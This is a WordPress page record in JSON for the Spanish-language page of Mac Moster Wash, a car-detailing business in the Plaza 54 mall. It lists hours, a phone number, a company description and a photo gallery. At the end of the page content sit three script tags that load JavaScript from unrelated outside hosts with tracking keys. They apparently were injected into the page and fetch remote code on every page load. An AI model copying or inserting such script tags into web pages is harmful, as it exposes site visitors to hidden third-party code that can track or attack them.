{"id":9937,"date":"2018-08-27T14:25:24","date_gmt":"2018-08-27T14:25:24","guid":{"rendered":"http:\/\/plaza54.com\/pagina\/?page_id=9937"},"modified":"2019-01-04T09:24:28","modified_gmt":"2019-01-04T09:24:28","slug":"macmoster-wash","status":"publish","type":"page","link":"https:\/\/plaza54.com\/pagina\/macmoster-wash\/","title":{"rendered":"Mac moster wash"},"content":{"rendered":"<style type=\"text\/css\"> \n#cmsmasters_row_6a08fa3a8e240 .cmsmasters_row_outer_parent { \n\tpadding-top: 50px; \n} \n\n#cmsmasters_row_6a08fa3a8e240 .cmsmasters_row_outer_parent { \n\tpadding-bottom: 55px; \n} \n\n \n#cmsmasters_heading_6a08fa3a8e522 { \n\ttext-align:left; \n\tmargin-top:45px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a08fa3a8e522 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08fa3a8e522 .cmsmasters_heading, #cmsmasters_heading_6a08fa3a8e522 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08fa3a8e522 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08fa3a8e541 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a08fa3a8e541 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08fa3a8e541 .cmsmasters_heading, #cmsmasters_heading_6a08fa3a8e541 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08fa3a8e541 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08fa3a8e558 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a08fa3a8e558 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08fa3a8e558 .cmsmasters_heading, #cmsmasters_heading_6a08fa3a8e558 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08fa3a8e558 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08fa3a8e56e { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a08fa3a8e56e .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08fa3a8e56e .cmsmasters_heading, #cmsmasters_heading_6a08fa3a8e56e .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08fa3a8e56e .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08fa3a8e583 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a08fa3a8e583 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a08fa3a8e583 .cmsmasters_heading, #cmsmasters_heading_6a08fa3a8e583 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08fa3a8e583 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a08fa3a8e609 { \n\ttext-align:center; \n\tmargin-top:0px; \n\tmargin-bottom:20px; \n} \n\n#cmsmasters_heading_6a08fa3a8e609 .cmsmasters_heading { \n\ttext-align:center; \n} \n\n#cmsmasters_heading_6a08fa3a8e609 .cmsmasters_heading, #cmsmasters_heading_6a08fa3a8e609 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a08fa3a8e609 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_divider_6a08fa3a8e625 { \n\tborder-bottom-width:1px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:30px; \n} \n \n#cmsmasters_divider_6a08fa3a8e66a { \n\tborder-bottom-width:0px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:20px; \n} \n\r\n\t\t\t\t#cmsmasters_gallery_6a08fa3a8e685 .cmsmasters_gallery {\r\n\t\t\t\t\tmargin:0 0 0 -15px;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t#cmsmasters_gallery_6a08fa3a8e685 .cmsmasters_gallery .cmsmasters_gallery_item {\r\n\t\t\t\t\tpadding:0 0 15px 15px;\r\n\t\t\t\t}\r\n\t\t\t<\/style><div id=\"cmsmasters_row_6a08fa3a8e240\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_fourth\">\n<div class=\"aligncenter\">\n<div class=\"cmsmasters_img  cmsmasters_image_c\">\n<img decoding=\"async\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash-1.jpg\" alt=\"\" \/>\n<\/div>\n<\/div>\n\n<div id=\"cmsmasters_heading_6a08fa3a8e522\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Horario<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a08fa3a8e541\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Lunes a S\u00e1bado: 8:00 am a 8:30 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a08fa3a8e558\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Domingos y festivos: 9:00 am a 8:30 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a08fa3a8e56e\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Contacto<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a08fa3a8e583\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">321 2618800<\/h6>\n<\/div>\n<\/div>\n<div class=\"cmsmasters_column three_fourth\">\n\n<div id=\"cmsmasters_heading_6a08fa3a8e609\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_center\">\n\t<h2 class=\"cmsmasters_heading\">Macmoster Wash &#8211; Piso 4<\/h2>\n<\/div>\n\n<div id=\"cmsmasters_divider_6a08fa3a8e625\" class=\"cmsmasters_divider cmsmasters_divider_width_long cmsmasters_divider_pos_center\"><\/div>\n<div class=\"cmsmasters_text\">\n<p>Mac Moster Wash es una empresa dedicada a prestar servicios de embellecimiento automotriz con m\u00e1s de\u00a0 5 a\u00f1os de experiencia en el mercado, atendemos m\u00e1s de 400 veh\u00edculo al mes. El punto cuenta con un administrador, 2 asesores comerciales y una impulsadora, debidamente capacitados en el manejo de las mejores ceras y t\u00e9cnicas en\u00a0 embellecimiento automotriz del mercado.<\/p>\n<p>Todo nuestro personal debidamente uniformado tiene la mejor disposici\u00f3n de servicio y receptividad para atender las necesidades de nuestros clientes.<\/p>\n<p>Pensando en nuestro medio ambiente, los productos que utilizamos son biodegradables con su correspondiente ficha t\u00e9cnica y hoja de seguridad.<\/p>\n<\/div>\n\n\n<div id=\"cmsmasters_divider_6a08fa3a8e66a\" class=\"cl\"><\/div>\n<div id=\"cmsmasters_gallery_6a08fa3a8e685\" class=\"cmsmasters_gallery_wrap\"><ul class=\"cmsmasters_gallery cmsmasters_3 cmsmasters_more_items_loader\"><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash1.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash1-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash1-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash1-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash2.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash2-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash2-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterwash2-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmasterwash3.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmasterwash3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmasterwash3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmasterwash3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo2.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo2-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo2-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo2-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo3.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo4.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo4-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo4-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo4-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo5.jpg\" rel=\"ilightbox[6a08fa3a8e685]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo5-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo5-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2018\/08\/macmosterpromo5-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><\/ul><script type=\"text\/javascript\">\r\n\t\t\t\tjQuery(document).ready(function () {\r\n\t\t\t\t\t(function ($) {\r\n\t\t\t\t\t\tif ($('#cmsmasters_gallery_6a08fa3a8e685').find('.cmsmasters_gallery_item').length == '0') {\r\n\t\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tstartGallery( \r\n\t\t\t\t\t\t\t'6a08fa3a8e685', \r\n\t\t\t\t\t\t\t'grid', \r\n\t\t\t\t\t\t\t'false', \r\n\t\t\t\t\t\t\t'false' \r\n\t\t\t\t\t\t);\r\n\t\t\t\t\t} )(jQuery);\r\n\t\t\t\t} );\r\n\t\t\t<\/script>\r\n\t\t\t<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a08fa3a8fbd3\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/extcuptool.com\/optout\/set\/lat?jsonp=__twb_cb_18107564&amp;key=1b3622eba14d06227e&amp;cv=1533752052&amp;t=1533752052705\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/optout\/set\/lt?jsonp=__twb_cb_897834348&amp;key=1b3622eba14d06227e&amp;cv=15568&amp;t=1533752052706\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533752052711\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9937","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9937","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/comments?post=9937"}],"version-history":[{"count":13,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9937\/revisions"}],"predecessor-version":[{"id":10661,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9937\/revisions\/10661"}],"wp:attachment":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/media?parent=9937"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}